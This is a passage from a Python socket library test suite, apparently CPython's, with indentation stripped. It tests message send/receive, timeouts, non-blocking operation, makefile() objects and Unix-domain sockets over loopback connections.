@unittest.skipIf(AIX, "IPPROTO_SCTP: [Errno 62] Protocol not supported on AIX")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgIntoSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
class SendrecvmsgUnixStreamTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, UnixStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "AF_UNIX")
class SendmsgUnixStreamTest(SendmsgStreamTests, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgUnixStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@requireAttrs(socket, "AF_UNIX")
class RecvmsgIntoUnixStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgSCMRightsStreamTest(SCMRightsTest, SendrecvmsgUnixStreamTestBase):
pass
@requireAttrs(socket.socket, "sendmsg", "recvmsg_into")
@requireAttrs(socket, "AF_UNIX", "SOL_SOCKET", "SCM_RIGHTS")
class RecvmsgIntoSCMRightsStreamTest(RecvmsgIntoMixin, SCMRightsTest,
SendrecvmsgUnixStreamTestBase):
pass
# Test interrupting the interruptible send/receive methods with a
# signal when a timeout is set. These tests avoid having multiple
# threads alive during the test so that the OS cannot deliver the
# signal to the wrong one.
class InterruptedTimeoutBase(unittest.TestCase):
# Base class for interrupted send/receive tests. Installs an
# empty handler for SIGALRM and removes it on teardown, along with
# any scheduled alarms.
def setUp(self):
super().setUp()
orig_alrm_handler = signal.signal(signal.SIGALRM,
lambda signum, frame: 1 / 0)
self.addCleanup(signal.signal, signal.SIGALRM, orig_alrm_handler)
# Timeout for socket operations
timeout = support.LOOPBACK_TIMEOUT
# Provide setAlarm() method to schedule delivery of SIGALRM after
# given number of seconds, or cancel it if zero, and an
# appropriate time value to use. Use setitimer() if available.
if hasattr(signal, "setitimer"):
alarm_time = 0.05
def setAlarm(self, seconds):
signal.setitimer(signal.ITIMER_REAL, seconds)
else:
# Old systems may deliver the alarm up to one second early
alarm_time = 2
def setAlarm(self, seconds):
signal.alarm(seconds)
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedRecvTimeoutTest(InterruptedTimeoutBase, UDPTestBase):
# Test interrupting the recv*() methods with signals when a
# timeout is set.
def setUp(self):
super().setUp()
self.serv.settimeout(self.timeout)
def checkInterruptedRecv(self, func, *args, **kwargs):
# Check that func(*args, **kwargs) raises
# errno of EINTR when interrupted by a signal.
try:
self.setAlarm(self.alarm_time)
with self.assertRaises(ZeroDivisionError) as cm:
func(*args, **kwargs)
finally:
self.setAlarm(0)
def testInterruptedRecvTimeout(self):
self.checkInterruptedRecv(self.serv.recv, 1024)
def testInterruptedRecvIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recv_into, bytearray(1024))
def testInterruptedRecvfromTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom, 1024)
def testInterruptedRecvfromIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvfrom_into, bytearray(1024))
@requireAttrs(socket.socket, "recvmsg")
def testInterruptedRecvmsgTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg, 1024)
@requireAttrs(socket.socket, "recvmsg_into")
def testInterruptedRecvmsgIntoTimeout(self):
self.checkInterruptedRecv(self.serv.recvmsg_into, [bytearray(1024)])
# Require siginterrupt() in order to ensure that system calls are
# interrupted by default.
@requireAttrs(signal, "siginterrupt")
@unittest.skipUnless(hasattr(signal, "alarm") or hasattr(signal, "setitimer"),
"Don't have signal.alarm or signal.setitimer")
class InterruptedSendTimeoutTest(InterruptedTimeoutBase,
ThreadSafeCleanupTestCase,
SocketListeningTestMixin, TCPTestBase):
# Test interrupting the interruptible send*() methods with signals
# when a timeout is set.
def setUp(self):
super().setUp()
self.serv_conn = self.newSocket()
self.addCleanup(self.serv_conn.close)
# Use a thread to complete the connection, but wait for it to
# terminate before running the test, so that there is only one
# thread to accept the signal.
cli_thread = threading.Thread(target=self.doConnect)
cli_thread.start()
self.cli_conn, addr = self.serv.accept()
self.addCleanup(self.cli_conn.close)
cli_thread.join()
self.serv_conn.settimeout(self.timeout)
def doConnect(self):
self.serv_conn.connect(self.serv_addr)
def checkInterruptedSend(self, func, *args, **kwargs):
# Check that func(*args, **kwargs), run in a loop, raises
# OSError with an errno of EINTR when interrupted by a
# signal.
try:
with self.assertRaises(ZeroDivisionError) as cm:
while True:
self.setAlarm(self.alarm_time)
func(*args, **kwargs)
finally:
self.setAlarm(0)
# Issue #12958: The following tests have problems on OS X prior to 10.7
@support.requires_mac_ver(10, 7)
def testInterruptedSendTimeout(self):
self.checkInterruptedSend(self.serv_conn.send, b"a"*512)
@support.requires_mac_ver(10, 7)
def testInterruptedSendtoTimeout(self):
# Passing an actual address here as Python's wrapper for
# sendto() doesn't allow passing a zero-length one; POSIX
# requires that the address is ignored since the socket is
# connection-mode, however.
self.checkInterruptedSend(self.serv_conn.sendto, b"a"*512,
self.serv_addr)
@support.requires_mac_ver(10, 7)
@requireAttrs(socket.socket, "sendmsg")
def testInterruptedSendmsgTimeout(self):
self.checkInterruptedSend(self.serv_conn.sendmsg, [b"a"*512])
class TCPCloserTest(ThreadedTCPSocketTest):
def testClose(self):
conn, addr = self.serv.accept()
conn.close()
sd = self.cli
read, write, err = select.select([sd], [], [], 1.0)
self.assertEqual(read, [sd])
self.assertEqual(sd.recv(1), b'')
# Calling close() many times should be safe.
conn.close()
conn.close()
def _testClose(self):
self.cli.connect((HOST, self.port))
time.sleep(1.0)
class BasicSocketPairTest(SocketPairTest):
def __init__(self, methodName='runTest'):
SocketPairTest.__init__(self, methodName=methodName)
def _check_defaults(self, sock):
self.assertIsInstance(sock, socket.socket)
if hasattr(socket, 'AF_UNIX'):
self.assertEqual(sock.family, socket.AF_UNIX)
else:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
def _testDefaults(self):
self._check_defaults(self.cli)
def testDefaults(self):
self._check_defaults(self.serv)
def testRecv(self):
msg = self.serv.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.send(MSG)
def testSend(self):
self.serv.send(MSG)
def _testSend(self):
msg = self.cli.recv(1024)
self.assertEqual(msg, MSG)
class NonBlockingTCPTests(ThreadedTCPSocketTest):
def __init__(self, methodName='runTest'):
self.event = threading.Event()
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def assert_sock_timeout(self, sock, timeout):
self.assertEqual(self.serv.gettimeout(), timeout)
blocking = (timeout != 0.0)
self.assertEqual(sock.getblocking(), blocking)
if fcntl is not None:
# When a Python socket has a non-zero timeout, it's switched
# internally to a non-blocking mode. Later, sock.sendall(),
# sock.recv(), and other socket operations use a select() call and
# handle EWOULDBLOCK/EGAIN on all socket operations. That's how
# timeouts are enforced.
fd_blocking = (timeout is None)
flag = fcntl.fcntl(sock, fcntl.F_GETFL, os.O_NONBLOCK)
if not (sys.platform == 'OpenVMS'): # OpenVMS fcntl does not work with O_NONBLOCK
self.assertEqual(not bool(flag & os.O_NONBLOCK), fd_blocking)
def testSetBlocking(self):
# Test setblocking() and settimeout() methods
self.serv.setblocking(True)
self.assert_sock_timeout(self.serv, None)
self.serv.setblocking(False)
self.assert_sock_timeout(self.serv, 0.0)
self.serv.settimeout(None)
self.assert_sock_timeout(self.serv, None)
self.serv.settimeout(0)
self.assert_sock_timeout(self.serv, 0)
self.serv.settimeout(10)
self.assert_sock_timeout(self.serv, 10)
self.serv.settimeout(0)
self.assert_sock_timeout(self.serv, 0)
def _testSetBlocking(self):
pass
@support.cpython_only
def testSetBlocking_overflow(self):
# Issue 15989
import _testcapi
if _testcapi.UINT_MAX >= _testcapi.ULONG_MAX:
self.skipTest('needs UINT_MAX < ULONG_MAX')
self.serv.setblocking(False)
self.assertEqual(self.serv.gettimeout(), 0.0)
self.serv.setblocking(_testcapi.UINT_MAX + 1)
self.assertIsNone(self.serv.gettimeout())
_testSetBlocking_overflow = support.cpython_only(_testSetBlocking)
@unittest.skipUnless(hasattr(socket, 'SOCK_NONBLOCK'),
'test needs socket.SOCK_NONBLOCK')
@support.requires_linux_version(2, 6, 28)
def testInitNonBlocking(self):
# create a socket with SOCK_NONBLOCK
self.serv.close()
self.serv = socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK)
self.assert_sock_timeout(self.serv, 0)
def _testInitNonBlocking(self):
pass
def testInheritFlagsBlocking(self):
# bpo-7995: accept() on a listening socket with a timeout and the
# default timeout is None, the resulting socket must be blocking.
with socket_setdefaulttimeout(None):
self.serv.settimeout(10)
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testInheritFlagsBlocking(self):
self.cli.connect((HOST, self.port))
def testInheritFlagsTimeout(self):
# bpo-7995: accept() on a listening socket with a timeout and the
# default timeout is None, the resulting socket must inherit
# the default timeout.
default_timeout = 20.0
with socket_setdefaulttimeout(default_timeout):
self.serv.settimeout(10)
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertEqual(conn.gettimeout(), default_timeout)
def _testInheritFlagsTimeout(self):
self.cli.connect((HOST, self.port))
def testAccept(self):
# Testing non-blocking accept
self.serv.setblocking(False)
# connect() didn't start: non-blocking accept() fails
start_time = time.monotonic()
with self.assertRaises(BlockingIOError):
conn, addr = self.serv.accept()
dt = time.monotonic() - start_time
self.assertLess(dt, 1.0)
self.event.set()
read, write, err = select.select([self.serv], [], [], support.LONG_TIMEOUT)
if self.serv not in read:
self.fail("Error trying to do accept after select.")
# connect() completed: non-blocking accept() doesn't block
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
self.assertIsNone(conn.gettimeout())
def _testAccept(self):
# don't connect before event is set to check
# that non-blocking accept() raises BlockingIOError
self.event.wait()
self.cli.connect((HOST, self.port))
def testRecv(self):
# Testing non-blocking recv
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
conn.setblocking(False)
# the server didn't send data yet: non-blocking recv() fails
with self.assertRaises(BlockingIOError):
msg = conn.recv(len(MSG))
self.event.set()
read, write, err = select.select([conn], [], [], support.LONG_TIMEOUT)
if conn not in read:
self.fail("Error during select call to non-blocking socket.")
# the server sent data yet: non-blocking recv() doesn't block
msg = conn.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testRecv(self):
self.cli.connect((HOST, self.port))
# don't send anything before event is set to check
# that non-blocking recv() raises BlockingIOError
self.event.wait()
# send data: recv() will no longer block
self.cli.sendall(MSG)
class FileObjectClassTestCase(SocketConnectedTest):
"""Unit tests for the object returned by socket.makefile()
self.read_file is the io object returned by makefile() on
the client connection. You can read from this file to
get output from the server.
self.write_file is the io object returned by makefile() on the
server connection. You can write to this file to send output
to the client.
"""
bufsize = -1 # Use default buffer size
encoding = 'utf-8'
errors = 'strict'
newline = None
read_mode = 'rb'
read_msg = MSG
write_mode = 'wb'
write_msg = MSG
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def setUp(self):
self.evt1, self.evt2, self.serv_finished, self.cli_finished = [
threading.Event() for i in range(4)]
SocketConnectedTest.setUp(self)
self.read_file = self.cli_conn.makefile(
self.read_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def tearDown(self):
self.serv_finished.set()
self.read_file.close()
self.assertTrue(self.read_file.closed)
self.read_file = None
SocketConnectedTest.tearDown(self)
def clientSetUp(self):
SocketConnectedTest.clientSetUp(self)
self.write_file = self.serv_conn.makefile(
self.write_mode, self.bufsize,
encoding = self.encoding,
errors = self.errors,
newline = self.newline)
def clientTearDown(self):
self.cli_finished.set()
self.write_file.close()
self.assertTrue(self.write_file.closed)
self.write_file = None
SocketConnectedTest.clientTearDown(self)
def testReadAfterTimeout(self):
# Issue #7322: A file object must disallow further reads
# after a timeout has occurred.
self.cli_conn.settimeout(1)
self.read_file.read(3)
# First read raises a timeout
self.assertRaises(TimeoutError, self.read_file.read, 1)
# Second read is disallowed
with self.assertRaises(OSError) as ctx:
self.read_file.read(1)
self.assertIn("cannot read from timed out object", str(ctx.exception))
def _testReadAfterTimeout(self):
self.write_file.write(self.write_msg[0:3])
self.write_file.flush()
self.serv_finished.wait()
def testSmallRead(self):
# Performing small file read test
first_seg = self.read_file.read(len(self.read_msg)-3)
second_seg = self.read_file.read(3)
msg = first_seg + second_seg
self.assertEqual(msg, self.read_msg)
def _testSmallRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testFullRead(self):
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testFullRead(self):
self.write_file.write(self.write_msg)
self.write_file.close()
def testUnbufferedRead(self):
# Performing unbuffered file read test
buf = type(self.read_msg)()
while 1:
char = self.read_file.read(1)
if not char:
break
buf += char
self.assertEqual(buf, self.read_msg)
def _testUnbufferedRead(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testReadline(self):
# Performing file readline test
line = self.read_file.readline()
self.assertEqual(line, self.read_msg)
def _testReadline(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testCloseAfterMakefile(self):
# The file returned by makefile should keep the socket open.
self.cli_conn.close()
# read until EOF
msg = self.read_file.read()
self.assertEqual(msg, self.read_msg)
def _testCloseAfterMakefile(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileAfterMakefileClose(self):
self.read_file.close()
msg = self.cli_conn.recv(len(MSG))
if isinstance(self.read_msg, str):
msg = msg.decode()
self.assertEqual(msg, self.read_msg)
def _testMakefileAfterMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testClosedAttr(self):
self.assertTrue(not self.read_file.closed)
def _testClosedAttr(self):
self.assertTrue(not self.write_file.closed)
def testAttributes(self):
self.assertEqual(self.read_file.mode, self.read_mode)
self.assertEqual(self.read_file.name, self.cli_conn.fileno())
def _testAttributes(self):
self.assertEqual(self.write_file.mode, self.write_mode)
self.assertEqual(self.write_file.name, self.serv_conn.fileno())
def testRealClose(self):
self.read_file.close()
self.assertRaises(ValueError, self.read_file.fileno)
self.cli_conn.close()
self.assertRaises(OSError, self.cli_conn.getsockname)
def _testRealClose(self):
pass
class UnbufferedFileObjectClassTestCase(FileObjectClassTestCase):
"""Repeat the tests from FileObjectClassTestCase with bufsize==0.
In this case (and in this case only), it should be possible to
create a file object, read a line from it, create another file
object, read another line from it, without loss of data in the
first file object's buffer. Note that http.client relies on this
when reading multiple requests from the same socket."""
bufsize = 0 # Use unbuffered mode
def testUnbufferedReadline(self):
# Read a line, create a new file object, read another line with it
line = self.read_file.readline() # first line
self.assertEqual(line, b"A. " + self.write_msg) # first line
self.read_file = self.cli_conn.makefile('rb', 0)
line = self.read_file.readline() # second line
self.assertEqual(line, b"B. " + self.write_msg) # second line
def _testUnbufferedReadline(self):
self.write_file.write(b"A. " + self.write_msg)
self.write_file.write(b"B. " + self.write_msg)
self.write_file.flush()
def testMakefileClose(self):
# The file returned by makefile should keep the socket open...
self.cli_conn.close()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, self.read_msg)
# ...until the file is itself closed
self.read_file.close()
self.assertRaises(OSError, self.cli_conn.recv, 1024)
def _testMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileCloseSocketDestroy(self):
refcount_before = sys.getrefcount(self.cli_conn)
self.read_file.close()
refcount_after = sys.getrefcount(self.cli_conn)
self.assertEqual(refcount_before - 1, refcount_after)
def _testMakefileCloseSocketDestroy(self):
pass
# Non-blocking ops
# NOTE: to set `read_file` as non-blocking, we must call
# `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).
def testSmallReadNonBlocking(self):
self.cli_conn.setblocking(False)
self.assertEqual(self.read_file.readinto(bytearray(10)), None)
self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
self.evt1.set()
self.evt2.wait(1.0)
first_seg = self.read_file.read(len(self.read_msg) - 3)
if first_seg is None:
# Data not arrived (can happen under Windows), wait a bit
time.sleep(0.5)
first_seg = self.read_file.read(len(self.read_msg) - 3)
buf = bytearray(10)
n = self.read_file.readinto(buf)
self.assertEqual(n, 3)
msg = first_seg + buf[:n]
self.assertEqual(msg, self.read_msg)
self.assertEqual(self.read_file.readinto(bytearray(16)), None)
self.assertEqual(self.read_file.read(1), None)
def _testSmallReadNonBlocking(self):
self.evt1.wait(1.0)
self.write_file.write(self.write_msg)
self.write_file.flush()
self.evt2.set()
# Avoid closing the socket before the server test has finished,
# otherwise system recv() will return 0 instead of EWOULDBLOCK.
self.serv_finished.wait(5.0)
def testWriteNonBlocking(self):
self.cli_finished.wait(5.0)
# The client thread can't skip directly - the SkipTest exception
# would appear as a failure.
if self.serv_skipped:
self.skipTest(self.serv_skipped)
def _testWriteNonBlocking(self):
self.serv_skipped = None
self.serv_conn.setblocking(False)
# Try to saturate the socket buffer pipe with repeated large writes.
BIG = b"x" * support.SOCK_MAX_SIZE
LIMIT = 10
# The first write() succeeds since a chunk of data can be buffered
n = self.write_file.write(BIG)
self.assertGreater(n, 0)
for i in range(LIMIT):
n = self.write_file.write(BIG)
if n is None:
# Succeeded
break
self.assertGreater(n, 0)
else:
# Let us know that this test didn't manage to establish
# the expected conditions. This is not a failure in itself but,
# if it happens repeatedly, the test should be fixed.
self.serv_skipped = "failed to saturate the socket buffer"
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 1 # Default-buffered for reading; line-buffered for writing
class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 2 # Exercise the buffering code
class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'wb'
write_msg = MSG
newline = ''
class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'rb'
read_msg = MSG
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class NetworkConnectionTest(object):
"""Prove network connection."""
def clientSetUp(self):
# We're inherited below by BasicTCPTest2, which also inherits
# BasicTCPTest, which defines self.port referenced below.
self.cli = socket.create_connection((HOST, self.port))
self.serv_conn = self.cli
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
"""Tests that NetworkConnection does not break existing TCP functionality.
"""
class NetworkConnectionNoServer(unittest.TestCase):
class MockSocket(socket.socket):
def connect(self, *args):
raise TimeoutError('timed out')
@contextlib.contextmanager
def mocked_socket_module(self):
"""Return a socket which times out on connect"""
old_socket = socket.socket
socket.socket = self.MockSocket
try:
yield
finally:
socket.socket = old_socket
def test_connect(self):
port = socket_helper.find_unused_port()
cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(cli.close)
with self.assertRaises(OSError) as cm:
cli.connect((HOST, port))
self.assertEqual(cm.exception.errno, errno.ECONNREFUSED)
def test_create_connection(self):
# Issue #9792: errors raised by create_connection() should have
# a proper errno attribute.
port = socket_helper.find_unused_port()
with self.assertRaises(OSError) as cm:
socket.create_connection((HOST, port))
# Issue #16257: create_connection() calls getaddrinfo() against
# 'localhost'. This may result in an IPV6 addr being returned
# as well as an IPV4 one:
# >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
# >>> [(2, 2, 0, '', ('127.0.0.1', 41230)),
# (26, 2, 0, '', ('::1', 41230, 0, 0))]
#
# create_connection() enumerates through all the addresses returned
# and if it doesn't successfully bind to any of them, it propagates
# the last exception it encountered.
#
# On Solaris, ENETUNREACH is returned in this circumstance instead
# of ECONNREFUSED. So, if that errno exists, add it to our list of
# expected errnos.
expected_errnos = socket_helper.get_socket_conn_refused_errs()
self.assertIn(cm.exception.errno, expected_errnos)
def test_create_connection_timeout(self):
# Issue #9792: create_connection() should not recast timeout errors
# as generic socket errors.
with self.mocked_socket_module():
try:
socket.create_connection((HOST, 1234))
except TimeoutError:
pass
except OSError as exc:
if socket_helper.IPV6_ENABLED or exc.errno != errno.EAFNOSUPPORT:
raise
else:
self.fail('TimeoutError not raised')
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.source_port = socket_helper.find_unused_port()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def _justAccept(self):
conn, addr = self.serv.accept()
conn.close()
testFamily = _justAccept
def _testFamily(self):
self.cli = socket.create_connection((HOST, self.port),
timeout=support.LOOPBACK_TIMEOUT)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.family, 2)
testSourceAddress = _justAccept
def _testSourceAddress(self):
self.cli = socket.create_connection((HOST, self.port),
timeout=support.LOOPBACK_TIMEOUT,
source_address=('', self.source_port))
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.getsockname()[1], self.source_port)
# The port number being used is sufficient to show that the bind()
# call happened.
testTimeoutDefault = _justAccept
def _testTimeoutDefault(self):
# passing no explicit timeout uses socket's global default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(42)
try:
self.cli = socket.create_connection((HOST, self.port))
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), 42)
testTimeoutNone = _justAccept
def _testTimeoutNone(self):
# None timeout means the same as sock.settimeout(None)
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
self.cli = socket.create_connection((HOST, self.port), timeout=None)
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), None)
testTimeoutValueNamed = _justAccept
def _testTimeoutValueNamed(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.assertEqual(self.cli.gettimeout(), 30)
testTimeoutValueNonamed = _justAccept
def _testTimeoutValueNonamed(self):
self.cli = socket.create_connection((HOST, self.port), 30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.gettimeout(), 30)
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def testInsideTimeout(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
time.sleep(3)
conn.send(b"done!")
testOutsideTimeout = testInsideTimeout
def _testInsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port))
data = sock.recv(5)
self.assertEqual(data, b"done!")
def _testOutsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
self.assertRaises(TimeoutError, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
def testTCPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.accept()
self.assertRaises(TimeoutError, raise_timeout,
"Error generating a timeout exception (TCP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.accept()
except TimeoutError:
self.fail("caught timeout instead of error (TCP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (TCP)")
if not ok:
self.fail("accept() returned success when we did not expect it")
@unittest.skipUnless(hasattr(signal, 'alarm'),
'test needs signal.alarm()')
@unittest.skipIf(sys.platform == 'OpenVMS', 'OpenVMS has no correct signal handling')
def testInterruptedTimeout(self):
# XXX I don't know how to do this test on MSWindows or any other
# platform that doesn't support signal.alarm() or os.kill(), though
# the bug should have existed on all platforms.
self.serv.settimeout(5.0) # must be longer than alarm
class Alarm(Exception):
pass
def alarm_handler(signal, frame):
raise Alarm
old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
try:
try:
signal.alarm(2) # POSIX allows alarm to be up to 1 second early
foo = self.serv.accept()
except TimeoutError:
self.fail("caught timeout instead of Alarm")
except Alarm:
pass
except:
self.fail("caught other exception instead of Alarm:"
" %s(%s):\n%s" %
(sys.exc_info()[:2] + (traceback.format_exc(),)))
else:
self.fail("nothing caught")
finally:
signal.alarm(0) # shut off alarm
except Alarm:
self.fail("got Alarm in wrong place")
finally:
# no alarm can be pending. Safe to restore old handler.
signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
def testUDPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(TimeoutError, raise_timeout,
"Error generating a timeout exception (UDP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except TimeoutError:
self.fail("caught timeout instead of error (UDP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDP)")
if not ok:
self.fail("recv() returned success when we did not expect it")
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class UDPLITETimeoutTest(SocketUDPLITETest):
def testUDPLITETimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(TimeoutError, raise_timeout,
"Error generating a timeout exception (UDPLITE)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except TimeoutError:
self.fail("caught timeout instead of error (UDPLITE)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDPLITE)")
if not ok:
self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
def testExceptionTree(self):
self.assertTrue(issubclass(OSError, Exception))
self.assertTrue(issubclass(socket.herror, OSError))
self.assertTrue(issubclass(socket.gaierror, OSError))
self.assertTrue(issubclass(socket.timeout, OSError))
self.assertIs(socket.error, OSError)
self.assertIs(socket.timeout, TimeoutError)
def test_setblocking_invalidfd(self):
# Regression test for issue #28471
sock0 = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
sock = socket.socket(
socket.AF_INET, socket.SOCK_STREAM, 0, sock0.fileno())
sock0.close()
self.addCleanup(sock.detach)
with self.assertRaises(OSError):
sock.setblocking(False)
@unittest.skipUnless(sys.platform == 'linux', 'Linux specific test')
class TestLinuxAbstractNamespace(unittest.TestCase):
UNIX_PATH_MAX = 108
def testLinuxAbstractNamespace(self):
address = b"\x00python-test-hello\x00\xff"
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s1:
s1.bind(address)
s1.listen()
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s2:
s2.connect(s1.getsockname())
with s1.accept()[0] as s3:
self.assertEqual(s1.getsockname(), address)
self.assertEqual(s2.getpeername(), address)
def testMaxName(self):
address = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testNameOverflow(self):
address = "\x00" + "h" * self.UNIX_PATH_MAX
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
self.assertRaises(OSError, s.bind, address)
def testStrName(self):
# Check that an abstract name can be passed as a string.
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
s.bind("\x00python\x00test\x00")
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
finally:
s.close()
def testBytearrayName(self):
# Check that an abstract name can be passed as a bytearray.
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(bytearray(b"\x00python\x00test\x00"))
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'test needs socket.AF_UNIX')
@unittest.skipIf(sys.platform == 'OpenVMS', 'OpenVMS does not implement socket.AF_UNIX')
class TestUnixDomain(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def tearDown(self):
self.sock.close()
def encoded(self, path):
# Return the given path encoded in the file system encoding,
# or skip the test if this is not possible.
try:
return os.fsencode(path)
except UnicodeEncodeError:
self.skipTest(
"Pathname {0!a} cannot be represented in file "
"system encoding {1!r}".format(
path, sys.getfilesystemencoding()))
def bind(self, sock, path):
# Bind the socket
try:
socket_helper.bind_unix_socket(sock, path)
except OSError as e:
if str(e) == "AF_UNIX path too long":
self.skipTest(
"Pathname {0!a} is too long to serve as an AF_UNIX path"
.format(path))
else:
raise
def testUnbound(self):
# Issue #30205 (note getsockname() can return None on OS X)
self.assertIn(self.sock.getsockname(), ('', None))
def testStrAddr(self):
# Test binding to and retrieving a normal string pathname.
path = os.path.abspath(os_helper.TESTFN)
self.bind(self.sock, path)
self.addCleanup(os_helper.unlink, path)
